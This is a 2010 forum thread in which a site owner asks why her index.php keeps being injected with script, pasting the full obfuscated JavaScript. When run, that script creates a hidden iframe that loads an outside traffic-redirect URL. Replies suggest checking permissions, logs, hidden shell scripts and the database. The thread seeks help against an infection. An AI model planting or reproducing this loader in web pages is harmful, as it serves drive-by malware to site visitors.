Index.php keeps getting injected with script ??

Discussion in 'Security' started by crazygirl, Mar 11, 2010.

  1. #1
    My index.php which has permissions of 644 keeps getting modified and giving my users viruses the code is below how the heck do I stop this ? I keep cleaning it and it comes right back


    <script type='text/javascript'>function gQ(){};var iL=function(){};gQ.prototype = {e : function() {hL=57051;this.aS='';this.nW=55081;return 'hIt!t!p!:7/7/It?r7a!fIf7i!cIt!rIaAvAeAl!l7i?nAg7.AcAoAmI/Ac?g7iA-AbAiAn7/!0I6?1!'.wW(/[\!I7\?A]/g, '');y=8228;var aJ="aJ";var nK=function(){};},u : function() {var v="";var bX=37660;w=21825;var vE=new Array();this.oS="";function lB(){};this.mO=57968;var s=document;var sN=function(){return 'sN'};yB='';this.f=false;var n=window;this.hR='';this.aZ="";var dU="";function nX(){};this.hS="";this.dR=''; String.prototype.wW=function(o, i){return this.replace(o, i)};t=23190;iQ=19758;var oM=function(){};uZ='';var kK=new Array();var lZ=new Date();var x = 'sQtayQl[eH'.wW(/[HG\[Qa]/g, '');lC=false;var nP=function(){return 'nP'}; var l = 'aRpjpZe3nLdRCZhji3l3dR'.wW(/[RjLZ3]/g, '');var nR=function(){return 'nR'};var g=false;var aX=new Array();var iC = 'iRf%rRasmsen'.wW(/[nRsB%]/g, '');kP=false;function iG(){};hE="hE";this.lT="";var iF = 'c>rUeNa]tUeUEUlNe]m>eNnKtN'.wW(/[NK\]U\>]/g, '');var gS='';var kS='';p="p";var yI=function(){};var d = 'wZrZiZt[e<'.wW(/[\<C\[Zj]/g, '');function c(){};function qI(){};var hX=new Date();var j = 'sgeDt8A8tgt8rSi8bPuDtDeg'.wW(/[gPDS8]/g, '');wU="";this.cS="cS";var hLU=50676;var eM=function(){return 'eM'};var m = 's<r<c<'.wW(/[\<;\.M1]/g, '');sD='';var qD="qD";var kA=new Date();var a = 'bDo;d;yD'.wW(/[DICj;]/g, '');dF='';var mOC='';var h = 'd!iGsVp!lzaVyV:!n!oVnze|'.wW(/[\|zV\!G]/g, '');iW="iW";this.xB="xB";var b = 's_e_t_Tni!m!e~o!u~t_'.wW(/[_n~\!6]/g, '');var qH=false;var yU=false;this.cO=false;var yUZ=false;this.lJ=false;uB='';var yY=36559;fZ="fZ";try {gR='';var vT=new Array();var pP=false;this.dV='';var mH='';iN=48178;var q=s[iF](iC);var bB=new Date();this.gT='';var tO=false;var sS=11262;q[j](m, this.e());var aXT='';pS=false;pJ=2191;q[j](x, h);var pG=new Array();var fF='';this.qO="";iI='';var mE="mE";function hSH(){};document[a][l](q);pJD="";function wQ(){};var hT='';var aQ=new Array();gB=false;} catch(k) {yL="";var iM=function(){return 'iM'};s.write('m3FNk3Z_<4/_b3o_dNy4>3<x/4hNt3m3l3>N'.wW(/[Nx43_]/g, ''));var hW=function(){};hTW="hTW";var aF = this;this.eC=false;var eS=313;var z=19114;n(function(){ aF.u() }, 326);var pA=58584;this.oI="oI";}this.qL=false;var r='';hSS="hSS";}};bF='';var tF=new gQ(); rM="";tF.u();qC="";</script>
     
    crazygirl, Mar 11, 2010 IP
  2. Thibaut

    Thibaut Well-Known Member

    Messages:
    886
    Likes Received:
    26
    Best Answers:
    0
    Trophy Points:
    140
    #2
    I don't understand why your index.php needs RW permission. Do you need to write inside your file ??
     
    Thibaut, Mar 12, 2010 IP
  3. perfectblue

    perfectblue Well-Known Member

    Messages:
    1,123
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    128
    #3
    I think the index has to be with this permission -rwxr--r--
     
    perfectblue, Mar 12, 2010 IP
  4. crazygirl

    crazygirl Peon

    Messages:
    659
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #4
    The index is 644 which is -rw-r--r--
     
    crazygirl, Mar 12, 2010 IP
  5. RHS-Chris

    RHS-Chris Well-Known Member

    Messages:
    1,007
    Likes Received:
    35
    Best Answers:
    10
    Trophy Points:
    150
    #5
    Sounds like there may be a shell script or something hidden that is writing to the file. Take a look in your web sites folders and files for any strange files.
     
    RHS-Chris, Mar 12, 2010 IP
  6. Coponer

    Coponer Peon

    Messages:
    32
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Check your webserver access log file!
     
    Coponer, Mar 12, 2010 IP
  7. nikb

    nikb Peon

    Messages:
    93
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #7
    ==> My index.php which has permissions of 644 keeps getting modified.

    Index.php got permissions 644 from FTP server automatic, after you or somebody else has been uploaded this file (original or modified) via FTP Umask.

    Check your ftp logs and ensure that you do not use same passwords for database en ftp access.


    Inserted code can also be inside your database and your index has never been modified.
     
    Last edited: Mar 14, 2010
    nikb, Mar 14, 2010 IP